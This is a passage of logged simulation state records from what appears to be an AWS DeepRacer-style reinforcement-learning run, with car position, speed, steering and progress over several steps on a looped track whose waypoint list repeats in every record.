{'is_left_of_center': True, 'projection_distance': 0.38718280457705984, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), 
(7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), 
(1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 1.3333333333333333, 'x': 3.360318239199224, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.9607014197320498, 'all_wheels_on_track': True, 'distance_from_center': 0.003189490145353297, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6096016069343125, 'object_in_camera': False, 'heading': 1.1534265481188193, 'objects_speed': [], 'progress': 1.9804949464177108, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [1, 2], 'track_length': 19.549800178858835, 'steering_angle': -10.000000000000004, 'steps': 8.0},
{'is_left_of_center': True, 'projection_distance': 0.4613673129751599, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), 
(7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), 
(1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 2.0, 'x': 3.434513541710265, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.9682327913973465, 'all_wheels_on_track': True, 'distance_from_center': 0.010850693277073015, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6095861829769621, 'object_in_camera': False, 'heading': 2.4432909721626266, 'objects_speed': [], 'progress': 2.359959225946886, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [2, 3], 'track_length': 19.549800178858835, 'steering_angle': -30.0, 'steps': 9.0},
{'is_left_of_center': True, 'projection_distance': 0.5398379830761915, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), 
(7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), 
(1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 0.6666666666666666, 'x': 3.5129910650101888, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.97216416392405, 'all_wheels_on_track': True, 'distance_from_center': 0.014916561834819316, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6096006411095111, 'object_in_camera': False, 'heading': 2.5651683948298047, 'objects_speed': [], 'progress': 2.761347830347507, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [2, 3], 'track_length': 19.549800178858835, 'steering_angle': -10.000000000000004, 'steps': 10.0},
{'is_left_of_center': True, 'projection_distance': 0.6396956392339029, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), 
(7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), 
(1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 0.6666666666666666, 'x': 3.6128402448619172, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.970047571665471, 'all_wheels_on_track': True, 'distance_from_center': 0.012950611627412687, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6095911678188735, 'object_in_camera': False, 'heading': 1.0553793308345887, 'objects_speed': [], 'progress': 3.2721339010189485, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [3, 4], 'track_length': 19.549800178858835, 'steering_angle': 0.0, 'steps': 11.0},
{'is_left_of_center': True, 'projection_distance': 0.7285704934836759, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), 
(7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), 
(1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 1.3333333333333333, 'x': 3.7017125943659805, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.9681031055656205, 'all_wheels_on_track': True, 'distance_from_center': 0.011124211652744676, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6095992343579433, 'object_in_camera': False, 'heading': 0.2767237291255475, 'objects_speed': [], 'progress': 3.7267413826129663, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [3, 4], 'track_length': 19.549800178858835, 'steering_angle': 30.0, 'steps': 12.0},
{'is_left_of_center': True, 'projection_distance': 0.8016274740696829, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), 
(7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), 
(1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 1.3333333333333333, 'x': 3.774765480699354, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.9669335292069253, 'all_wheels_on_track': True, 'distance_from_center': 0.01004660075486568, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6095998714493209, 'object_in_camera': False, 'heading': -0.1052403210258782, 'objects_speed': [], 'progress': 4.100438197504255, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [4, 5], 'track_length': 19.549800178858835, 'steering_angle': 20.0, 'steps': 13.0},
{'is_left_of_center': True, 'projection_distance': 0.8745401089016366, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), 
(7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), 